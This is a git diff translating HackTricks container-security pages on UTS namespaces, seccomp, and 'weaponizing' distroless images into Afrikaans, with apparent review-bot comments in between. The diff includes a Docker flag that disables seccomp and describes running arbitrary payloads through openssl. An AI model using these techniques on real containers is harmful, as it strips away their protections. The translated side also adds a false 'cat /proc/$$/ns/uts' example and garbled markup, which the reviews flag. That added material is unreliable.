#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` +### Kyk watter namespace jou proses in is -### Check which namespace is your process in +Om te bepaal in watter namespace jou proses tans is, kan jy die volgende opdrag gebruik: +```bash +cat /proc/$$/ns/uts +``` + +Hier is die betekenis van die opdrag: + +- `cat`: Die opdrag om die inhoud van 'n lêer te vertoon. +- `/proc/$$/ns/uts`: Die pad na die UTS-namespace-lêer van die huidige proses. + +Die uitset van hierdie opdrag sal die inode-nommer van die UTS-namespace-lêer wees. ```bash ls -l /proc/self/ns/uts lrwxrwxrwx 1 root root 0 Apr 4 20:49 /proc/self/ns/uts -> 'uts:[4026531838]' ``` - -### Find all UTS namespaces +### Vind alle UTS-ruimtes {% code overflow="wrap" %} ```bash @@ -79,36 +86,34 @@ sudo find /proc -maxdepth 3 -type l -name uts -exec readlink {} \; 2>/dev/null | # Find the processes with an specific namespace sudo find /proc -maxdepth 3 -type l -name uts -exec ls -l {} \; 2>/dev/null | grep ``` +{% code %} + +### Betree 'n UTS-namespace + {% endcode %} - -### Enter inside an UTS namespace - ```bash nsenter -u TARGET_PID --pid /bin/bash ``` +Ook, jy kan slegs **toegang verkry tot 'n ander proses-namespace as jy root is**. En jy kan **nie** **toegang kry tot 'n ander namespace sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/uts`). -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/uts`). - -### Change hostname - +### Verander gasheernaam ```bash unshare -u /bin/bash hostname newhostname # Hostname won't be changed inside the host UTS ns ``` - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
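Review bot: the `@@ -79,36 +86,34 @@` hunk breaks the GitBook code wrapper around the "Find all UTS namespaces" block: the `+` side inserts a second opener and moves the heading inside the wrapper, so the block now reads `{% code overflow="wrap" %} ... ``` {% code %} ### Betree 'n UTS-namespace {% endcode %}`, leaving one `{% code %}` unclosed and a heading inside a code wrapper. Keep the source ordering: `{% endcode %}` directly after the closing fence, then the heading. The first hunk of this file also adds material the source does not contain, a `cat /proc/$$/ns/uts` block with a three-bullet explanation stating that the command prints the inode number; the `/proc/<pid>/ns/*` entries are symlinks to nsfs inodes that do not support read(), so `cat` on them fails with "Invalid argument", which is exactly why the source shows `ls -l /proc/self/ns/uts` and `readlink`. A translation commit should drop the invented block and keep the existing `ls -l` example. Two smaller points: the nested bullets under `+1. **Probleemverduideliking**:` lose their leading indentation on the `+` side (`+- Die Linux-kernel ...` now starts at column 0), which flattens the markdown list; and `### Vind alle UTS-ruimtes` renders "namespaces" as "ruimtes" while every other heading in the file keeps "namespace".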
diff --git a/linux-hardening/privilege-escalation/docker-security/seccomp.md b/linux-hardening/privilege-escalation/docker-security/seccomp.md index 0e2fc5bf9..0529191e8 100644 --- a/linux-hardening/privilege-escalation/docker-security/seccomp.md +++ b/linux-hardening/privilege-escalation/docker-security/seccomp.md @@ -2,29 +2,29 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Basic Information +## Basiese Inligting -**Seccomp**, standing for Secure Computing mode, is a security feature of the **Linux kernel designed to filter system calls**. It restricts processes to a limited set of system calls (`exit()`, `sigreturn()`, `read()`, and `write()` for already-open file descriptors). If a process tries to call anything else, it gets terminated by the kernel using SIGKILL or SIGSYS. This mechanism doesn't virtualize resources but isolates the process from them. +**Seccomp**, wat staan vir Secure Computing Mode, is 'n sekuriteitskenmerk van die **Linux-kernel wat ontwerp is om stelseloproepe te filtreer**. Dit beperk prosesse tot 'n beperkte stel stelseloproepe (`exit()`, `sigreturn()`, `read()` en `write()` vir reeds-geopen lêerbeskrywers). As 'n proses probeer om iets anders te roep, word dit deur die kernel beëindig deur gebruik te maak van SIGKILL of SIGSYS. Hierdie meganisme virtualiseer nie hulpbronne nie, maar isoleer die proses daarvan. -There are two ways to activate seccomp: through the `prctl(2)` system call with `PR_SET_SECCOMP`, or for Linux kernels 3.17 and above, the `seccomp(2)` system call. The older method of enabling seccomp by writing to `/proc/self/seccomp` has been deprecated in favor of `prctl()`. +Daar is twee maniere om seccomp te aktiveer: deur die `prctl(2)` stelseloproep met `PR_SET_SECCOMP`, of vir Linux-kernel 3.17 en hoër, die `seccomp(2)` stelseloproep. Die ouer metode om seccomp te aktiveer deur na `/proc/self/seccomp` te skryf, is verouderd en is vervang deur `prctl()`. -An enhancement, **seccomp-bpf**, adds the capability to filter system calls with a customizable policy, using Berkeley Packet Filter (BPF) rules. This extension is leveraged by software such as OpenSSH, vsftpd, and the Chrome/Chromium browsers on Chrome OS and Linux for flexible and efficient syscall filtering, offering an alternative to the now unsupported systrace for Linux. 
+'n Verbetering, **seccomp-bpf**, voeg die vermoë by om stelseloproepe te filtreer met 'n aanpasbare beleid deur gebruik te maak van Berkeley Packet Filter (BPF) reëls. Hierdie uitbreiding word benut deur sagteware soos OpenSSH, vsftpd, en die Chrome/Chromium-webblaaier op Chrome OS en Linux vir buigsame en doeltreffende stelseloproep-filtrering, as 'n alternatief vir die nou nie-ondersteunde systrace vir Linux. -### **Original/Strict Mode** +### **Oorspronklike/Strikte Modus** -In this mode Seccomp **only allow the syscalls** `exit()`, `sigreturn()`, `read()` and `write()` to already-open file descriptors. If any other syscall is made, the process is killed using SIGKILL +In hierdie modus laat Seccomp **slegs die stelseloproepe toe** `exit()`, `sigreturn()`, `read()` en `write()` na reeds-geopen lêerbeskrywers. As enige ander stelseloproep gemaak word, word die proses doodgemaak deur gebruik te maak van SIGKILL. {% code title="seccomp_strict.c" %} ```c 
@@ -40,29 +40,29 @@ In this mode Seccomp **only allow the syscalls** `exit()`, `sigreturn()`, `read( int main(int argc, char **argv) { - int output = open("output.txt", O_WRONLY); - const char *val = "test"; - - //enables strict seccomp mode - printf("Calling prctl() to set seccomp strict mode...\n"); - prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT); - - //This is allowed as the file was already opened - printf("Writing to an already open file...\n"); - write(output, val, strlen(val)+1); - - //This isn't allowed - printf("Trying to open file for reading...\n"); - int input = open("output.txt", O_RDONLY); - - printf("You will not see this message--the process will be killed first\n"); +int output = open("output.txt", O_WRONLY); +const char *val = "test"; + +//enables strict seccomp mode +printf("Calling prctl() to set seccomp strict mode...\n"); +prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT); + +//This is allowed as the file was already opened +printf("Writing to an already open file...\n"); +write(output, val, strlen(val)+1); + +//This isn't allowed +printf("Trying to open file for reading...\n"); +int input = open("output.txt", O_RDONLY); + +printf("You will not see this message--the process will be killed first\n"); } ``` {% endcode %} ### Seccomp-bpf -This mode allows **filtering of system calls using a configurable policy** implemented using Berkeley Packet Filter rules. +Hierdie modus maak dit moontlik om **sistemaanroepings te filter deur gebruik te maak van 'n konfigureerbare beleid** wat geïmplementeer word deur gebruik te maak van Berkeley Packet Filter reëls. {% code title="seccomp_bpf.c" %} ```c 
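Review bot: the `@@ -40,29 +40,29 @@` hunk strips the indentation from every line of the `seccomp_strict.c` body (`-    int output = open("output.txt", O_WRONLY);` becomes `+int output = open("output.txt", O_WRONLY);`) although no code changed; a translation commit should leave code blocks byte-for-byte as they were, so revert these lines to the indented form and keep the diff to prose only. In the `@@ -2,29 +2,29 @@` hunk, "system calls" is translated as "stelseloproepe" throughout the Basiese Inligting paragraphs but as "sistemaanroepings" in the Seccomp-bpf sentence at the end of the second hunk; pick one term for the file.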
@@ -75,119 +75,109 @@ This mode allows **filtering of system calls using a configurable policy** imple //gcc seccomp_bpf.c -o seccomp_bpf -lseccomp void main(void) { - /* initialize the libseccomp context */ - scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); - - /* allow exiting */ - printf("Adding rule : Allow exit_group\n"); - seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); - - /* allow getting the current pid */ - //printf("Adding rule : Allow getpid\n"); - //seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0); - - printf("Adding rule : Deny getpid\n"); - seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(getpid), 0); - /* allow changing data segment size, as required by glibc */ - printf("Adding rule : Allow brk\n"); - seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0); - - /* allow writing up to 512 bytes to fd 1 */ - printf("Adding rule : Allow write upto 512 bytes to FD 1\n"); - seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 2, - SCMP_A0(SCMP_CMP_EQ, 1), - SCMP_A2(SCMP_CMP_LE, 512)); - - /* if writing to any other fd, return -EBADF */ - printf("Adding rule : Deny write to any FD except 1 \n"); - seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(write), 1, - SCMP_A0(SCMP_CMP_NE, 1)); - - /* load and enforce the filters */ - printf("Load rules and enforce \n"); - seccomp_load(ctx); - seccomp_release(ctx); - //Get the getpid is denied, a weird number will be returned like - //this process is -9 - printf("this process is %d\n", getpid()); +/* initialize the libseccomp context */ +scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); + +/* allow exiting */ +printf("Adding rule : Allow exit_group\n"); +seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); + +/* allow getting the current pid */ +//printf("Adding rule : Allow getpid\n"); +//seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0); + +printf("Adding rule : Deny getpid\n"); +seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(getpid), 0); +/* 
allow changing data segment size, as required by glibc */ +printf("Adding rule : Allow brk\n"); +seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0); + +/* allow writing up to 512 bytes to fd 1 */ +printf("Adding rule : Allow write upto 512 bytes to FD 1\n"); +seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 2, +SCMP_A0(SCMP_CMP_EQ, 1), +SCMP_A2(SCMP_CMP_LE, 512)); + +/* if writing to any other fd, return -EBADF */ +printf("Adding rule : Deny write to any FD except 1 \n"); +seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(write), 1, +SCMP_A0(SCMP_CMP_NE, 1)); + +/* load and enforce the filters */ +printf("Load rules and enforce \n"); +seccomp_load(ctx); +seccomp_release(ctx); +//Get the getpid is denied, a weird number will be returned like +//this process is -9 +printf("this process is %d\n", getpid()); } ``` {% endcode %} ## Seccomp in Docker -**Seccomp-bpf** is supported by **Docker** to restrict the **syscalls** from the containers effectively decreasing the surface area. You can find the **syscalls blocked** by **default** in [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/) and the **default seccomp profile** can be found here [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json).\ -You can run a docker container with a **different seccomp** policy with: - +**Seccomp-bpf** word deur **Docker** ondersteun om die **syscalls** van die houers te beperk en sodoende die oppervlakte te verminder. 
Jy kan die **syscalls wat standaard geblokkeer word** vind by [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/) en die **standaard seccomp-profiel** kan hier gevind word [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json).\ +Jy kan 'n docker-houer uitvoer met 'n **verskillende seccomp-beleid** met: ```bash docker run --rm \ - -it \ - --security-opt seccomp=/path/to/seccomp/profile.json \ - hello-world +-it \ +--security-opt seccomp=/path/to/seccomp/profile.json \ +hello-world ``` - -If you want for example to **forbid** a container of executing some **syscall** like `uname` you could download the default profile from [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) and just **remove the `uname` string from the list**.\ -If you want to make sure that **some binary doesn't work inside a a docker container** you could use strace to list the syscalls the binary is using and then forbid them.\ -In the following example the **syscalls** of `uname` are discovered: - +As jy byvoorbeeld 'n houer wil **verbied** om sekere **syscall** soos `uname` uit te voer, kan jy die verstek profiel aflaai vanaf [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) en net die `uname` string uit die lys **verwyder**.\ +As jy seker wil maak dat **'n sekere binêre lêer nie binne 'n Docker-houer werk nie**, kan jy strace gebruik om die syscalls wat die binêre lêer gebruik, te lys en dit dan verbied.\ +In die volgende voorbeeld word die **syscalls** van `uname` ontdek: ```bash docker run -it --security-opt seccomp=default.json modified-ubuntu strace uname ``` - {% hint style="info" %} -If you are using **Docker just to launch an application**, you can **profile** it 
with **`strace`** and **just allow the syscalls** it needs +As jy **Docker net gebruik om 'n toepassing te begin**, kan jy dit **profiler** met **`strace`** en slegs die syscalls toelaat wat dit nodig het. {% endhint %} -### Example Seccomp policy +### Voorbeeld Seccomp-beleid -[Example from here](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/) - -To illustrate Seccomp feature, let’s create a Seccomp profile disabling “chmod” system call as below. +[Voorbeeld van hier](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/) +Om die Seccomp-funksie te illustreer, skep ons 'n Seccomp-profiel wat die "chmod" stelseloproep deaktiveer soos hieronder. ```json { - "defaultAction": "SCMP_ACT_ALLOW", - "syscalls": [ - { - "name": "chmod", - "action": "SCMP_ACT_ERRNO" - } - ] +"defaultAction": "SCMP_ACT_ALLOW", +"syscalls": [ +{ +"name": "chmod", +"action": "SCMP_ACT_ERRNO" +} +] } ``` - -In the above profile, we have set default action to “allow” and created a black list to disable “chmod”. To be more secure, we can set default action to drop and create a white list to selectively enable system calls.\ -Following output shows the “chmod” call returning error because its disabled in the seccomp profile - +In die bogenoemde profiel het ons die verstekaksie op "toelaat" gestel en 'n swartlys geskep om "chmod" te deaktiveer. Om meer veilig te wees, kan ons die verstekaksie op "afwerp" stel en 'n witlys skep om selektief stelseloproepe toe te laat.\ +Die volgende uitset toon die "chmod" oproep wat 'n fout teruggee omdat dit gedeaktiveer is in die seccomp-profiel. 
```bash $ docker run --rm -it --security-opt seccomp:/home/smakam14/seccomp/profile.json busybox chmod 400 /etc/hosts chmod: /etc/hosts: Operation not permitted ``` - -Following output shows the “docker inspect” displaying the profile: - +Die volgende uitset toon die "docker inspect" wat die profiel vertoon: ```json - "SecurityOpt": [ - "seccomp:{\"defaultAction\":\"SCMP_ACT_ALLOW\",\"syscalls\":[{\"name\":\"chmod\",\"action\":\"SCMP_ACT_ERRNO\"}]}" - ], +"SecurityOpt": [ +"seccomp:{\"defaultAction\":\"SCMP_ACT_ALLOW\",\"syscalls\":[{\"name\":\"chmod\",\"action\":\"SCMP_ACT_ERRNO\"}]}" +], ``` +### Deaktiveer dit in Docker -### Deactivate it in Docker +Begin 'n houer met die vlag: **`--security-opt seccomp=unconfined`** -Launch a container with the flag: **`--security-opt seccomp=unconfined`** - -As of Kubernetes 1.19, **seccomp is enabled by default for all Pods**. However, the default seccomp profile applied to the Pods is the "**RuntimeDefault**" profile, which is **provided by the container runtime** (e.g., Docker, containerd). The "RuntimeDefault" profile allows most system calls while blocking a few that are considered dangerous or not generally required by containers. +Vanaf Kubernetes 1.19, is **seccomp standaard geaktiveer vir alle Pods**. Die verstek seccomp profiel wat op die Pods toegepas word, is die "**RuntimeDefault**" profiel, wat **voorsien word deur die houer runtime** (bv. Docker, containerd). Die "RuntimeDefault" profiel laat die meeste stelseloproepe toe terwyl dit 'n paar blokkeer wat as gevaarlik beskou word of nie algemeen deur houers benodig word nie.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
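Review bot: this hunk again rewrites unchanged code as whitespace-only changes: the whole `seccomp_bpf.c` body, the `docker run --rm \` / `-it \` / `--security-opt seccomp=/path/to/seccomp/profile.json \` command and both JSON fragments (`"defaultAction": "SCMP_ACT_ALLOW"` and the `"SecurityOpt"` block) lose their leading spaces, and the blank lines before and after the fences are dropped. None of that is translation; revert the whitespace changes so the diff contains only the translated prose. In the last paragraph the translation of "However, the default seccomp profile applied to the Pods is the RuntimeDefault profile" drops the "However", so the contrast between "seccomp is enabled by default" and "but only with the runtime's own profile" is lost; `Die verstek seccomp-profiel ... is egter ...` would keep it.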
diff --git a/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md b/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md index 522f9a413..9cb0ec5ee 100644 --- a/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md +++ b/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md @@ -1,56 +1,56 @@ -# Weaponizing Distroless +# Bewapening van Distroless
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Andere manieren om HackTricks te ondersteunen: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks in PDF wilt downloaden**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)! +* Koop de [**officiële PEASS & HackTricks-merchandise**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit je aan bij de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## What is Distroless +## Wat is Distroless -A distroless container is a type of container that **contains only the necessary dependencies to run a specific application**, without any additional software or tools that are not required. These containers are designed to be as **lightweight** and **secure** as possible, and they aim to **minimize the attack surface** by removing any unnecessary components. +Een distroless-container is een type container dat **alleen de noodzakelijke afhankelijkheden bevat om een specifieke toepassing uit te voeren**, zonder extra software of tools die niet nodig zijn. Deze containers zijn ontworpen om zo **lichtgewicht** en **veilig** mogelijk te zijn en ze streven ernaar om **het aanvalsoppervlak te minimaliseren** door onnodige componenten te verwijderen. -Distroless containers are often used in **production environments where security and reliability are paramount**. +Distroless-containers worden vaak gebruikt in **productieomgevingen waar beveiliging en betrouwbaarheid van groot belang zijn**. 
-Some **examples** of **distroless containers** are: +Enkele **voorbeelden** van **distroless-containers** zijn: -* Provided by **Google**: [https://console.cloud.google.com/gcr/images/distroless/GLOBAL](https://console.cloud.google.com/gcr/images/distroless/GLOBAL) -* Provided by **Chainguard**: [https://github.com/chainguard-images/images/tree/main/images](https://github.com/chainguard-images/images/tree/main/images) +* Aangeboden door **Google**: [https://console.cloud.google.com/gcr/images/distroless/GLOBAL](https://console.cloud.google.com/gcr/images/distroless/GLOBAL) +* Aangeboden door **Chainguard**: [https://github.com/chainguard-images/images/tree/main/images](https://github.com/chainguard-images/images/tree/main/images) -## Weaponizing Distroless +## Bewapening van Distroless -The goal of weaponize a distroless container is to be able to **execute arbitrary binaries and payloads even with the limitations** implied by **distroless** (lack of common binaries in the system) and also protections commonly found in containers such as **read-only** or **no-execute** in `/dev/shm`. +Het doel van het bewapenen van een distroless-container is om in staat te zijn **willekeurige binaries en payloads uit te voeren, zelfs met de beperkingen** die worden opgelegd door **distroless** (gebrek aan gangbare binaries in het systeem) en ook beveiligingsmaatregelen die vaak worden aangetroffen in containers, zoals **alleen-lezen** of **niet-uitvoeren** in `/dev/shm`. -### Through memory +### Via het geheugen -Coming at some point of 2023... +Komt op een gegeven moment in 2023... -### Via Existing binaries +### Via bestaande binaries #### openssl -****[**In this post,**](https://www.form3.tech/engineering/content/exploiting-distroless-images) it is explained that the binary **`openssl`** is frequently found in these containers, potentially because it's **needed** by the software that is going to be running inside the container. 
+****[**In deze post**](https://www.form3.tech/engineering/content/exploiting-distroless-images) wordt uitgelegd dat de binary **`openssl`** vaak wordt aangetroffen in deze containers, mogelijk omdat deze **nodig** is voor de software die binnen de container wordt uitgevoerd. -Abusing the **`openssl`** binary is possible to **execute arbitrary stuff**. +Door misbruik te maken van de **`openssl`** binary is het mogelijk om **willekeurige dingen uit te voeren**.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Andere manieren om HackTricks te ondersteunen: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks in PDF wilt downloaden**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)! +* Koop de [**officiële PEASS & HackTricks-merchandise**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit je aan bij de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
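Review bot: this file is translated into Dutch, not Afrikaans, contrary to the commit subject `Translated to Afrikaans`: `Andere manieren om HackTricks te ondersteunen`, `Een distroless-container is een type container dat alleen de noodzakelijke afhankelijkheden bevat` and `Komt op een gegeven moment in 2023...` are Dutch forms (compare `Ander maniere om HackTricks te ondersteun` and `Leer AWS-hacking van nul tot held` in the other files of this commit). The file needs to be redone in the target language. The footer is also inconsistent with the rest of the commit: here the link texts become `ABONNEMENTSPAKKETTEN` and `officiële PEASS & HackTricks-merchandise`, whereas the other files keep `SUBSCRIPTION PLANS` and `amptelike PEASS & HackTricks swag` untranslated.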
diff --git a/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md b/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md index ab1e5c854..9ffd7107e 100644 --- a/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md +++ b/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md @@ -1,31 +1,30 @@ -# Node inspector/CEF debug abuse +# Node inspector/CEF debug misbruik
